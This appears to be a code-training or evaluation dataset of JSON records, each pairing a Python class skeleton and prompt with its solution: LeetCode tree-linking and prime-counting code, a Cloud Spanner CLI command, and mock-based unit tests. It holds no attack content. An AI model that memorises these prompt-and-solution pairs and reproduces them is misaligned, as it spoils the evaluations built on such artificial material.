13} {"blob_id": "835c6a48b1e3ec48fba6dc1e46224544165a4300", "bodies": ["if not root or not root.left:\n return root\npre = root\nwhile pre.left:\n cur = pre\n while cur:\n cur.left.next = cur.right\n if cur.next:\n cur.right.next = cur.next.left\n cur = cur.next\n pre = pre.left\nreturn root", "if not root:\n return root\nqueue = [(root, 0)]\nwhile queue:\n cur, depth = queue.pop(0)\n if cur.left:\n queue.append((cur.left, depth + 1))\n if cur.right:\n queue.append((cur.right, depth + 1))\n if queue and queue[0][1] == depth:\n cur.next = queue[0][0]\nreturn root", "if not root or not root.left:\n return root\nroot.left.next = root.right\nif root.next:\n root.right.next = root.next.left\nself.connect3(root.left)\nself.connect3(root.right)\nreturn root"], "bodies_text": "<|body_start_0|>\n if not root or not root.left:\n return root\n pre = root\n while pre.left:\n cur = pre\n while cur:\n cur.left.next = cur.right\n if cur.next:\n cur.right.next = cur.next.left\n cur = cur.next\n pre = pre.left\n return root\n<|end_body_0|>\n\n<|body_start_1|>\n if not root:\n return root\n queue = [(root, 0)]\n while queue:\n cur, depth = queue.pop(0)\n if cur.left:\n queue.append((cur.left, depth + 1))\n if cur.right:\n queue.append((cur.right, depth + 1))\n if queue and queue[0][1] == depth:\n cur.next = queue[0][0]\n return root\n<|end_body_1|>\n\n<|body_start_2|>\n if not root or not root.left:\n return root\n root.left.next = root.right\n if root.next:\n root.right.next = root.next.left\n self.connect3(root.left)\n self.connect3(root.right)\n return root\n<|end_body_2|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def connect(self, root):\n \"\"\"' 修已改版bfs 只使用常数项空间 经有上一层的next了,所以就不需要队列来存储了 :type root: Node :rtype: Node\"\"\"\n <|body_0|>\n\n def connect2(self, root):\n \"\"\"bfs遍历每一层 下一个节点在同一个节点的时候next指向下一个节点 不符合常数空间要求 :type root: Node :rtype: Node\"\"\"\n <|body_1|>\n\n def connect3(self, root):\n \"\"\"' 递归版 :type root: Node :rtype: Node\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not root or not root.left:\n return root\n pre = root\n while pre.left:\n cur = pre\n while cur:\n cur.left.next = cur.right\n if cur.next:\n cur.right.next = cur.next.left\n cur = cur.next\n pre = pre.left\n return root\n<|end_body_0|>\n\n<|body_start_1|>\n if not root:\n return root\n queue = [(root, 0)]\n while queue:\n cur, depth = 
queue.pop(0)\n if cur.left:\n queue.append((cur.left, depth + 1))\n if cur.right:\n queue.append((cur.right, depth + 1))\n if queue and queue[0][1] == depth:\n cur.next = queue[0][0]\n return root\n<|end_body_1|>\n\n<|body_start_2|>\n if not root or not root.left:\n return root\n root.left.next = root.right\n if root.next:\n root.right.next = root.next.left\n self.connect3(root.left)\n self.connect3(root.right)\n return root\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000253", "length_bytes": 3426, "license_type": "no_license", "methods": [{"docstring": "' 修已改版bfs 只使用常数项空间 经有上一层的next了,所以就不需要队列来存储了 :type root: Node :rtype: Node", "name": "connect", "signature": "def connect(self, root)"}, {"docstring": "bfs遍历每一层 下一个节点在同一个节点的时候next指向下一个节点 不符合常数空间要求 :type root: Node :rtype: Node", "name": "connect2", "signature": "def connect2(self, root)"}, {"docstring": "' 递归版 :type root: Node :rtype: Node", "name": "connect3", "signature": "def connect3(self, root)"}], "n_methods": 3, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def connect(self, root): ' 修已改版bfs 只使用常数项空间 经有上一层的next了,所以就不需要队列来存储了 :type root: Node :rtype: Node\n- def connect2(self, root): bfs遍历每一层 下一个节点在同一个节点的时候next指向下一个节点 不符合常数空间要求 :type root: Node :rtype: Node\n- def connect3(self, root): ' 递归版 :type root: Node :rtype: Node", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def connect(self, root): ' 修已改版bfs 只使用常数项空间 经有上一层的next了,所以就不需要队列来存储了 :type root: Node :rtype: Node\n- def connect2(self, root): bfs遍历每一层 下一个节点在同一个节点的时候next指向下一个节点 不符合常数空间要求 :type root: Node :rtype: Node\n- def connect3(self, root): ' 递归版 :type root: Node :rtype: Node\n\n<|skeleton|>\nclass Solution:\n\n def connect(self, root):\n \"\"\"' 修已改版bfs 只使用常数项空间 经有上一层的next了,所以就不需要队列来存储了 :type root: Node :rtype: Node\"\"\"\n <|body_0|>\n\n def connect2(self, root):\n \"\"\"bfs遍历每一层 下一个节点在同一个节点的时候next指向下一个节点 不符合常数空间要求 :type root: Node :rtype: Node\"\"\"\n <|body_1|>\n\n def connect3(self, root):\n \"\"\"' 递归版 :type root: Node :rtype: Node\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not root or not root.left:\n return root\n pre = root\n while pre.left:\n cur = pre\n while cur:\n cur.left.next = cur.right\n if cur.next:\n cur.right.next = cur.next.left\n cur = cur.next\n pre = pre.left\n return root\n<|end_body_0|>\n\n<|body_start_1|>\n if not root:\n return root\n queue = [(root, 0)]\n while queue:\n cur, depth = queue.pop(0)\n if cur.left:\n queue.append((cur.left, depth + 1))\n if cur.right:\n queue.append((cur.right, depth + 1))\n if queue and queue[0][1] == depth:\n cur.next = queue[0][0]\n return root\n<|end_body_1|>\n\n<|body_start_2|>\n if not root or not root.left:\n return root\n root.left.next = root.right\n if root.next:\n root.right.next = root.next.left\n self.connect3(root.left)\n self.connect3(root.right)\n return root\n<|end_body_2|>\n", "revision_id": "5d3574ccd282d0146c83c286ae28d8baaabd4910", "skeleton": "<|skeleton|>\nclass Solution:\n\n def connect(self, root):\n \"\"\"' 修已改版bfs 只使用常数项空间 经有上一层的next了,所以就不需要队列来存储了 :type root: Node :rtype: Node\"\"\"\n <|body_0|>\n\n def connect2(self, root):\n \"\"\"bfs遍历每一层 下一个节点在同一个节点的时候next指向下一个节点 不符合常数空间要求 :type root: Node :rtype: Node\"\"\"\n <|body_1|>\n\n def connect3(self, root):\n \"\"\"' 递归版 :type root: Node :rtype: Node\"\"\"\n 
<|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def connect(self, root):\n \"\"\"' 修已改版bfs 只使用常数项空间 经有上一层的next了,所以就不需要队列来存储了 :type root: Node :rtype: Node\"\"\"\n if not root or not root.left:\n return root\n pre = root\n while pre.left:\n cur = pre\n while cur:\n cur.left.next = cur.right\n if cur.next:\n cur.right.next = cur.next.left\n cur = cur.next\n pre = pre.left\n return root\n\n def connect2(self, root):\n \"\"\"bfs遍历每一层 下一个节点在同一个节点的时候next指向下一个节点 不符合常数空间要求 :type root: Node :rtype: Node\"\"\"\n if not root:\n return root\n queue = [(root, 0)]\n while queue:\n cur, depth = queue.pop(0)\n if cur.left:\n queue.append((cur.left, depth + 1))\n if cur.right:\n queue.append((cur.right, depth + 1))\n if queue and queue[0][1] == depth:\n cur.next = queue[0][0]\n return root\n\n def connect3(self, root):\n \"\"\"' 递归版 :type root: Node :rtype: Node\"\"\"\n if not root or not root.left:\n return root\n root.left.next = root.right\n if root.next:\n root.right.next = root.next.left\n self.connect3(root.left)\n self.connect3(root.right)\n return root\n", "source": "the_stack_v2_python_sparse", "source_path": "116_填充每个节点的下一个右侧节点指针.py", "source_repo": "lovehhf/LeetCode", "split": "test", "star_events_count": 0} {"blob_id": "f81931f2c6e14ce5f801ceaeeae8884a47883eeb", "bodies": ["flags.Instance().AddToParser(parser)\nflags.Config().AddToParser(parser)\nflags.Description().AddToParser(parser)\nresource_args.AddExpireBehaviorArg(parser)\nresource_args.AddInstanceTypeArg(parser)\ngroup_parser = parser.add_argument_group(mutex=True, required=False)\nflags.Nodes().AddToParser(group_parser)\nflags.ProcessingUnits().AddToParser(group_parser)\nbase.ASYNC_FLAG.AddToParser(parser)\nparser.display_info.AddCacheUpdater(flags.InstanceCompleter)", "instance_type = resource_args.GetInstanceType(args)\nexpire_behavior = resource_args.GetExpireBehavior(args)\nop = instances.Create(args.instance, args.config, args.description, args.nodes, args.processing_units, instance_type, expire_behavior)\nif args.async_:\n return op\ninstance_operations.Await(op, 'Creating instance')"], "bodies_text": "<|body_start_0|>\n flags.Instance().AddToParser(parser)\n flags.Config().AddToParser(parser)\n flags.Description().AddToParser(parser)\n resource_args.AddExpireBehaviorArg(parser)\n resource_args.AddInstanceTypeArg(parser)\n group_parser = parser.add_argument_group(mutex=True, required=False)\n flags.Nodes().AddToParser(group_parser)\n flags.ProcessingUnits().AddToParser(group_parser)\n base.ASYNC_FLAG.AddToParser(parser)\n parser.display_info.AddCacheUpdater(flags.InstanceCompleter)\n<|end_body_0|>\n\n<|body_start_1|>\n instance_type = resource_args.GetInstanceType(args)\n expire_behavior = resource_args.GetExpireBehavior(args)\n op = instances.Create(args.instance, args.config, args.description, args.nodes, args.processing_units, instance_type, expire_behavior)\n if args.async_:\n return op\n instance_operations.Await(op, 'Creating instance')\n<|end_body_1|>\n", "class_docstring": "Create a Cloud Spanner instance.", "class_name": "Create", "detected_licenses": ["Apache-2.0", "LicenseRef-scancode-unknown-license-reference"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Create:\n \"\"\"Create a Cloud Spanner instance.\"\"\"\n\n def Args(parser):\n \"\"\"Args is called by calliope to gather arguments for this command. 
Please add arguments in alphabetical order except for no- or a clear- pair for that argument which can follow the argument itself. Args: parser: An argparse parser that you can use to add arguments that go on the command line after this command. Positional arguments are allowed.\"\"\"\n <|body_0|>\n\n def Run(self, args):\n \"\"\"This is what gets called when the user runs this command. Args: args: an argparse namespace. All the arguments that were provided to this command invocation. Returns: Some value that we want to have printed later.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n flags.Instance().AddToParser(parser)\n flags.Config().AddToParser(parser)\n flags.Description().AddToParser(parser)\n resource_args.AddExpireBehaviorArg(parser)\n resource_args.AddInstanceTypeArg(parser)\n group_parser = parser.add_argument_group(mutex=True, required=False)\n flags.Nodes().AddToParser(group_parser)\n flags.ProcessingUnits().AddToParser(group_parser)\n base.ASYNC_FLAG.AddToParser(parser)\n parser.display_info.AddCacheUpdater(flags.InstanceCompleter)\n<|end_body_0|>\n\n<|body_start_1|>\n instance_type = resource_args.GetInstanceType(args)\n expire_behavior = resource_args.GetExpireBehavior(args)\n op = instances.Create(args.instance, args.config, args.description, args.nodes, args.processing_units, instance_type, expire_behavior)\n if args.async_:\n return op\n instance_operations.Await(op, 'Creating instance')\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000254", "length_bytes": 5848, "license_type": "permissive", "methods": [{"docstring": "Args is called by calliope to gather arguments for this command. Please add arguments in alphabetical order except for no- or a clear- pair for that argument which can follow the argument itself. Args: parser: An argparse parser that you can use to add arguments that go on the command line after this command. Positional arguments are allowed.", "name": "Args", "signature": "def Args(parser)"}, {"docstring": "This is what gets called when the user runs this command. Args: args: an argparse namespace. All the arguments that were provided to this command invocation. Returns: Some value that we want to have printed later.", "name": "Run", "signature": "def Run(self, args)"}], "n_methods": 2, "prompt": "Implement the Python class `Create` described below.\n\nClass description:\nCreate a Cloud Spanner instance.\n\nMethod signatures and docstrings:\n- def Args(parser): Args is called by calliope to gather arguments for this command. Please add arguments in alphabetical order except for no- or a clear- pair for that argument which can follow the argument itself. Args: parser: An argparse parser that you can use to add arguments that go on the command line after this command. Positional arguments are allowed.\n- def Run(self, args): This is what gets called when the user runs this command. Args: args: an argparse namespace. All the arguments that were provided to this command invocation. Returns: Some value that we want to have printed later.", "prompted_full_text": "Implement the Python class `Create` described below.\n\nClass description:\nCreate a Cloud Spanner instance.\n\nMethod signatures and docstrings:\n- def Args(parser): Args is called by calliope to gather arguments for this command. Please add arguments in alphabetical order except for no- or a clear- pair for that argument which can follow the argument itself. Args: parser: An argparse parser that you can use to add arguments that go on the command line after this command. 
Positional arguments are allowed.\n- def Run(self, args): This is what gets called when the user runs this command. Args: args: an argparse namespace. All the arguments that were provided to this command invocation. Returns: Some value that we want to have printed later.\n\n<|skeleton|>\nclass Create:\n \"\"\"Create a Cloud Spanner instance.\"\"\"\n\n def Args(parser):\n \"\"\"Args is called by calliope to gather arguments for this command. Please add arguments in alphabetical order except for no- or a clear- pair for that argument which can follow the argument itself. Args: parser: An argparse parser that you can use to add arguments that go on the command line after this command. Positional arguments are allowed.\"\"\"\n <|body_0|>\n\n def Run(self, args):\n \"\"\"This is what gets called when the user runs this command. Args: args: an argparse namespace. All the arguments that were provided to this command invocation. Returns: Some value that we want to have printed later.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n flags.Instance().AddToParser(parser)\n flags.Config().AddToParser(parser)\n flags.Description().AddToParser(parser)\n resource_args.AddExpireBehaviorArg(parser)\n resource_args.AddInstanceTypeArg(parser)\n group_parser = parser.add_argument_group(mutex=True, required=False)\n flags.Nodes().AddToParser(group_parser)\n flags.ProcessingUnits().AddToParser(group_parser)\n base.ASYNC_FLAG.AddToParser(parser)\n parser.display_info.AddCacheUpdater(flags.InstanceCompleter)\n<|end_body_0|>\n\n<|body_start_1|>\n instance_type = resource_args.GetInstanceType(args)\n expire_behavior = resource_args.GetExpireBehavior(args)\n op = instances.Create(args.instance, args.config, args.description, args.nodes, args.processing_units, instance_type, expire_behavior)\n if args.async_:\n return op\n instance_operations.Await(op, 'Creating instance')\n<|end_body_1|>\n", "revision_id": "392abf004b16203030e6efd2f0af24db7c8d669e", "skeleton": "<|skeleton|>\nclass Create:\n \"\"\"Create a Cloud Spanner instance.\"\"\"\n\n def Args(parser):\n \"\"\"Args is called by calliope to gather arguments for this command. Please add arguments in alphabetical order except for no- or a clear- pair for that argument which can follow the argument itself. Args: parser: An argparse parser that you can use to add arguments that go on the command line after this command. Positional arguments are allowed.\"\"\"\n <|body_0|>\n\n def Run(self, args):\n \"\"\"This is what gets called when the user runs this command. Args: args: an argparse namespace. All the arguments that were provided to this command invocation. Returns: Some value that we want to have printed later.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Create:\n \"\"\"Create a Cloud Spanner instance.\"\"\"\n\n def Args(parser):\n \"\"\"Args is called by calliope to gather arguments for this command. Please add arguments in alphabetical order except for no- or a clear- pair for that argument which can follow the argument itself. Args: parser: An argparse parser that you can use to add arguments that go on the command line after this command. 
Positional arguments are allowed.\"\"\"\n flags.Instance().AddToParser(parser)\n flags.Config().AddToParser(parser)\n flags.Description().AddToParser(parser)\n resource_args.AddExpireBehaviorArg(parser)\n resource_args.AddInstanceTypeArg(parser)\n group_parser = parser.add_argument_group(mutex=True, required=False)\n flags.Nodes().AddToParser(group_parser)\n flags.ProcessingUnits().AddToParser(group_parser)\n base.ASYNC_FLAG.AddToParser(parser)\n parser.display_info.AddCacheUpdater(flags.InstanceCompleter)\n\n def Run(self, args):\n \"\"\"This is what gets called when the user runs this command. Args: args: an argparse namespace. All the arguments that were provided to this command invocation. Returns: Some value that we want to have printed later.\"\"\"\n instance_type = resource_args.GetInstanceType(args)\n expire_behavior = resource_args.GetExpireBehavior(args)\n op = instances.Create(args.instance, args.config, args.description, args.nodes, args.processing_units, instance_type, expire_behavior)\n if args.async_:\n return op\n instance_operations.Await(op, 'Creating instance')\n", "source": "the_stack_v2_python_sparse", "source_path": "lib/surface/spanner/instances/create.py", "source_repo": "google-cloud-sdk-unofficial/google-cloud-sdk", "split": "test", "star_events_count": 9} {"blob_id": "d1b787336fe35da55a36dee3da81a43b697fdbd0", "bodies": ["sol = solution.Solution()\nself.assertTrue(sol.isPrime(2))\nself.assertTrue(sol.isPrime(3))\nself.assertTrue(sol.isPrime(7))", "sol = solution.Solution()\nself.assertFalse(sol.isPrime(1))\nself.assertFalse(sol.isPrime(4))\nself.assertFalse(sol.isPrime(6))", "sol = solution.Solution()\nn = 10\nself.assertEqual(4, sol.countPrimes(n))", "sol = solution.Solution()\nn = 0\nself.assertEqual(0, sol.countPrimes(n))", "sol = solution.Solution()\nn = 1\nself.assertEqual(0, sol.countPrimes(n))"], "bodies_text": "<|body_start_0|>\n sol = solution.Solution()\n self.assertTrue(sol.isPrime(2))\n self.assertTrue(sol.isPrime(3))\n self.assertTrue(sol.isPrime(7))\n<|end_body_0|>\n\n<|body_start_1|>\n sol = solution.Solution()\n self.assertFalse(sol.isPrime(1))\n self.assertFalse(sol.isPrime(4))\n self.assertFalse(sol.isPrime(6))\n<|end_body_1|>\n\n<|body_start_2|>\n sol = solution.Solution()\n n = 10\n self.assertEqual(4, sol.countPrimes(n))\n<|end_body_2|>\n\n<|body_start_3|>\n sol = solution.Solution()\n n = 0\n self.assertEqual(0, sol.countPrimes(n))\n<|end_body_3|>\n\n<|body_start_4|>\n sol = solution.Solution()\n n = 1\n self.assertEqual(0, sol.countPrimes(n))\n<|end_body_4|>\n", "class_docstring": "", "class_name": "TestMethods", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass TestMethods:\n\n def test_is_prime_valid(self):\n \"\"\"Valid primes are 2, 3, 5, 7.\"\"\"\n <|body_0|>\n\n def test_is_prime_invalid(self):\n \"\"\"Valid primes are 2, 3, 5, 7.\"\"\"\n <|body_1|>\n\n def test_example_1(self):\n \"\"\"Example 1: Input: n = 10 Output: 4 Explanation: There are 4 prime numbers less than 10, they are 2, 3, 5, 7.\"\"\"\n <|body_2|>\n\n def test_example_2(self):\n \"\"\"Example 2: Input: n = 0 Output: 0\"\"\"\n <|body_3|>\n\n def test_example_3(self):\n \"\"\"Example 3: Input: n = 1 Output: 0\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n sol = solution.Solution()\n self.assertTrue(sol.isPrime(2))\n self.assertTrue(sol.isPrime(3))\n self.assertTrue(sol.isPrime(7))\n<|end_body_0|>\n\n<|body_start_1|>\n sol = solution.Solution()\n self.assertFalse(sol.isPrime(1))\n 
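The `TestMethods` record that begins here exercises a `Solution` class that the snapshot itself does not ship. One implementation consistent with all five test bodies, as a sketch: trial-division `isPrime` plus a Sieve of Eratosthenes `countPrimes`. Only the method names are fixed by the tests; the rest is an assumption.

class Solution:
    def isPrime(self, n):
        # Trial division; sufficient for the small values the tests use.
        if n < 2:
            return False
        i = 2
        while i * i <= n:
            if n % i == 0:
                return False
            i += 1
        return True

    def countPrimes(self, n):
        # Sieve of Eratosthenes: count primes strictly less than n.
        if n < 3:
            return 0
        sieve = [True] * n
        sieve[0] = sieve[1] = False
        for p in range(2, int(n ** 0.5) + 1):
            if sieve[p]:
                for multiple in range(p * p, n, p):
                    sieve[multiple] = False
        return sum(sieve)

With this sketch, `countPrimes(10)` returns 4 (primes 2, 3, 5, 7 below 10) and `countPrimes(0)` and `countPrimes(1)` both return 0, matching the three example tests.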
self.assertFalse(sol.isPrime(4))\n self.assertFalse(sol.isPrime(6))\n<|end_body_1|>\n\n<|body_start_2|>\n sol = solution.Solution()\n n = 10\n self.assertEqual(4, sol.countPrimes(n))\n<|end_body_2|>\n\n<|body_start_3|>\n sol = solution.Solution()\n n = 0\n self.assertEqual(0, sol.countPrimes(n))\n<|end_body_3|>\n\n<|body_start_4|>\n sol = solution.Solution()\n n = 1\n self.assertEqual(0, sol.countPrimes(n))\n<|end_body_4|>\n", "id": "stack_v2_sparse_classes_10k_test_000255", "length_bytes": 1455, "license_type": "no_license", "methods": [{"docstring": "Valid primes are 2, 3, 5, 7.", "name": "test_is_prime_valid", "signature": "def test_is_prime_valid(self)"}, {"docstring": "Valid primes are 2, 3, 5, 7.", "name": "test_is_prime_invalid", "signature": "def test_is_prime_invalid(self)"}, {"docstring": "Example 1: Input: n = 10 Output: 4 Explanation: There are 4 prime numbers less than 10, they are 2, 3, 5, 7.", "name": "test_example_1", "signature": "def test_example_1(self)"}, {"docstring": "Example 2: Input: n = 0 Output: 0", "name": "test_example_2", "signature": "def test_example_2(self)"}, {"docstring": "Example 3: Input: n = 1 Output: 0", "name": "test_example_3", "signature": "def test_example_3(self)"}], "n_methods": 5, "original_id": "stack_v2_sparse_classes_30k_train_000269", "prompt": "Implement the Python class `TestMethods` described below.\n\nClass description:\nImplement the TestMethods class.\n\nMethod signatures and docstrings:\n- def test_is_prime_valid(self): Valid primes are 2, 3, 5, 7.\n- def test_is_prime_invalid(self): Valid primes are 2, 3, 5, 7.\n- def test_example_1(self): Example 1: Input: n = 10 Output: 4 Explanation: There are 4 prime numbers less than 10, they are 2, 3, 5, 7.\n- def test_example_2(self): Example 2: Input: n = 0 Output: 0\n- def test_example_3(self): Example 3: Input: n = 1 Output: 0", "prompted_full_text": "Implement the Python class `TestMethods` described below.\n\nClass description:\nImplement the TestMethods class.\n\nMethod signatures and docstrings:\n- def test_is_prime_valid(self): Valid primes are 2, 3, 5, 7.\n- def test_is_prime_invalid(self): Valid primes are 2, 3, 5, 7.\n- def test_example_1(self): Example 1: Input: n = 10 Output: 4 Explanation: There are 4 prime numbers less than 10, they are 2, 3, 5, 7.\n- def test_example_2(self): Example 2: Input: n = 0 Output: 0\n- def test_example_3(self): Example 3: Input: n = 1 Output: 0\n\n<|skeleton|>\nclass TestMethods:\n\n def test_is_prime_valid(self):\n \"\"\"Valid primes are 2, 3, 5, 7.\"\"\"\n <|body_0|>\n\n def test_is_prime_invalid(self):\n \"\"\"Valid primes are 2, 3, 5, 7.\"\"\"\n <|body_1|>\n\n def test_example_1(self):\n \"\"\"Example 1: Input: n = 10 Output: 4 Explanation: There are 4 prime numbers less than 10, they are 2, 3, 5, 7.\"\"\"\n <|body_2|>\n\n def test_example_2(self):\n \"\"\"Example 2: Input: n = 0 Output: 0\"\"\"\n <|body_3|>\n\n def test_example_3(self):\n \"\"\"Example 3: Input: n = 1 Output: 0\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n sol = solution.Solution()\n self.assertTrue(sol.isPrime(2))\n self.assertTrue(sol.isPrime(3))\n self.assertTrue(sol.isPrime(7))\n<|end_body_0|>\n\n<|body_start_1|>\n sol = solution.Solution()\n self.assertFalse(sol.isPrime(1))\n self.assertFalse(sol.isPrime(4))\n self.assertFalse(sol.isPrime(6))\n<|end_body_1|>\n\n<|body_start_2|>\n sol = solution.Solution()\n n = 10\n self.assertEqual(4, sol.countPrimes(n))\n<|end_body_2|>\n\n<|body_start_3|>\n sol = solution.Solution()\n n = 0\n self.assertEqual(0, 
sol.countPrimes(n))\n<|end_body_3|>\n\n<|body_start_4|>\n sol = solution.Solution()\n n = 1\n self.assertEqual(0, sol.countPrimes(n))\n<|end_body_4|>\n", "revision_id": "52d71a93de7f002ac887a82c947e1e32a3e7255f", "skeleton": "<|skeleton|>\nclass TestMethods:\n\n def test_is_prime_valid(self):\n \"\"\"Valid primes are 2, 3, 5, 7.\"\"\"\n <|body_0|>\n\n def test_is_prime_invalid(self):\n \"\"\"Valid primes are 2, 3, 5, 7.\"\"\"\n <|body_1|>\n\n def test_example_1(self):\n \"\"\"Example 1: Input: n = 10 Output: 4 Explanation: There are 4 prime numbers less than 10, they are 2, 3, 5, 7.\"\"\"\n <|body_2|>\n\n def test_example_2(self):\n \"\"\"Example 2: Input: n = 0 Output: 0\"\"\"\n <|body_3|>\n\n def test_example_3(self):\n \"\"\"Example 3: Input: n = 1 Output: 0\"\"\"\n <|body_4|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class TestMethods:\n def test_is_prime_valid(self):\n \"\"\"Valid primes are 2, 3, 5, 7.\"\"\"\n sol = solution.Solution()\n self.assertTrue(sol.isPrime(2))\n self.assertTrue(sol.isPrime(3))\n self.assertTrue(sol.isPrime(7))\n\n def test_is_prime_invalid(self):\n \"\"\"Valid primes are 2, 3, 5, 7.\"\"\"\n sol = solution.Solution()\n self.assertFalse(sol.isPrime(1))\n self.assertFalse(sol.isPrime(4))\n self.assertFalse(sol.isPrime(6))\n\n def test_example_1(self):\n \"\"\"Example 1: Input: n = 10 Output: 4 Explanation: There are 4 prime numbers less than 10, they are 2, 3, 5, 7.\"\"\"\n sol = solution.Solution()\n n = 10\n self.assertEqual(4, sol.countPrimes(n))\n\n def test_example_2(self):\n \"\"\"Example 2: Input: n = 0 Output: 0\"\"\"\n sol = solution.Solution()\n n = 0\n self.assertEqual(0, sol.countPrimes(n))\n\n def test_example_3(self):\n \"\"\"Example 3: Input: n = 1 Output: 0\"\"\"\n sol = solution.Solution()\n n = 1\n self.assertEqual(0, sol.countPrimes(n))\n", "source": "the_stack_v2_python_sparse", "source_path": "count-primes/test.py", "source_repo": "code-in-public/leetcode", "split": "test", "star_events_count": 3} {"blob_id": "dade8670a6538df136ed6fbb61c6487cf4454292", "bodies": ["self.pump = Pump('127.0.0.1', 8000)\nself.sensor = Sensor('127.0.0.1', 8000)\nself.decider = Decider(100, 0.05)\nself.controller = Controller(self.sensor, self.pump, self.decider)", "self.sensor.measure = MagicMock(return_value=90)\nself.pump.get_state = MagicMock(return_value=Pump.PUMP_OFF)\nself.decider.decide = MagicMock(return_value=Pump.PUMP_IN)\nself.pump.set_state = MagicMock(return_value=True)\nself.controller.tick()\nself.sensor.measure.assert_called_with()\nself.pump.get_state.assert_called_with()\nself.decider.decide.assert_called_with(90, self.pump.PUMP_OFF, self.controller.actions)\nself.pump.set_state.assert_called_with(self.pump.PUMP_IN)"], "bodies_text": "<|body_start_0|>\n self.pump = Pump('127.0.0.1', 8000)\n self.sensor = Sensor('127.0.0.1', 8000)\n self.decider = Decider(100, 0.05)\n self.controller = Controller(self.sensor, self.pump, self.decider)\n<|end_body_0|>\n\n<|body_start_1|>\n self.sensor.measure = MagicMock(return_value=90)\n self.pump.get_state = MagicMock(return_value=Pump.PUMP_OFF)\n self.decider.decide = MagicMock(return_value=Pump.PUMP_IN)\n self.pump.set_state = MagicMock(return_value=True)\n self.controller.tick()\n self.sensor.measure.assert_called_with()\n self.pump.get_state.assert_called_with()\n self.decider.decide.assert_called_with(90, self.pump.PUMP_OFF, self.controller.actions)\n 
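`test_tick` in the `ControllerTests` record pins down the controller's call sequence (measure, get_state, decide, set_state) without showing `Controller` itself. A minimal `Controller.tick` consistent with those assertions is sketched below; the constructor shape and the `actions` mapping are inferred from the test, not taken from the real water-regulation module.

class Controller:
    def __init__(self, sensor, pump, decider):
        self.sensor = sensor
        self.pump = pump
        self.decider = decider
        # Mapping of action names to pump states; the contents are assumed.
        self.actions = {'PUMP_IN': 1, 'PUMP_OUT': -1, 'PUMP_OFF': 0}

    def tick(self):
        # One pass of the control loop: read the water level, read the pump,
        # ask the decider for the next state, and apply it.
        height = self.sensor.measure()
        state = self.pump.get_state()
        new_state = self.decider.decide(height, state, self.actions)
        return self.pump.set_state(new_state)

class _Stub:  # minimal stand-ins so the sketch runs on its own
    def measure(self): return 90
    def get_state(self): return 0
    def decide(self, height, state, actions): return actions['PUMP_IN']
    def set_state(self, state): return True

s = _Stub()
print(Controller(s, s, s).tick())  # True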
self.pump.set_state.assert_called_with(self.pump.PUMP_IN)\n<|end_body_1|>\n", "class_docstring": "Unit tests for the Controller class", "class_name": "ControllerTests", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ControllerTests:\n \"\"\"Unit tests for the Controller class\"\"\"\n\n def setUp(self):\n \"\"\"setUp method for Controller tests\"\"\"\n <|body_0|>\n\n def test_tick(self):\n \"\"\"Test for the tick function\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.pump = Pump('127.0.0.1', 8000)\n self.sensor = Sensor('127.0.0.1', 8000)\n self.decider = Decider(100, 0.05)\n self.controller = Controller(self.sensor, self.pump, self.decider)\n<|end_body_0|>\n\n<|body_start_1|>\n self.sensor.measure = MagicMock(return_value=90)\n self.pump.get_state = MagicMock(return_value=Pump.PUMP_OFF)\n self.decider.decide = MagicMock(return_value=Pump.PUMP_IN)\n self.pump.set_state = MagicMock(return_value=True)\n self.controller.tick()\n self.sensor.measure.assert_called_with()\n self.pump.get_state.assert_called_with()\n self.decider.decide.assert_called_with(90, self.pump.PUMP_OFF, self.controller.actions)\n self.pump.set_state.assert_called_with(self.pump.PUMP_IN)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000256", "length_bytes": 2522, "license_type": "no_license", "methods": [{"docstring": "setUp method for Controller tests", "name": "setUp", "signature": "def setUp(self)"}, {"docstring": "Test for the tick function", "name": "test_tick", "signature": "def test_tick(self)"}], "n_methods": 2, "prompt": "Implement the Python class `ControllerTests` described below.\n\nClass description:\nUnit tests for the Controller class\n\nMethod signatures and docstrings:\n- def setUp(self): setUp method for Controller tests\n- def test_tick(self): Test for the tick function", "prompted_full_text": "Implement the Python class `ControllerTests` described below.\n\nClass description:\nUnit tests for the Controller class\n\nMethod signatures and docstrings:\n- def setUp(self): setUp method for Controller tests\n- def test_tick(self): Test for the tick function\n\n<|skeleton|>\nclass ControllerTests:\n \"\"\"Unit tests for the Controller class\"\"\"\n\n def setUp(self):\n \"\"\"setUp method for Controller tests\"\"\"\n <|body_0|>\n\n def test_tick(self):\n \"\"\"Test for the tick function\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.pump = Pump('127.0.0.1', 8000)\n self.sensor = Sensor('127.0.0.1', 8000)\n self.decider = Decider(100, 0.05)\n self.controller = Controller(self.sensor, self.pump, 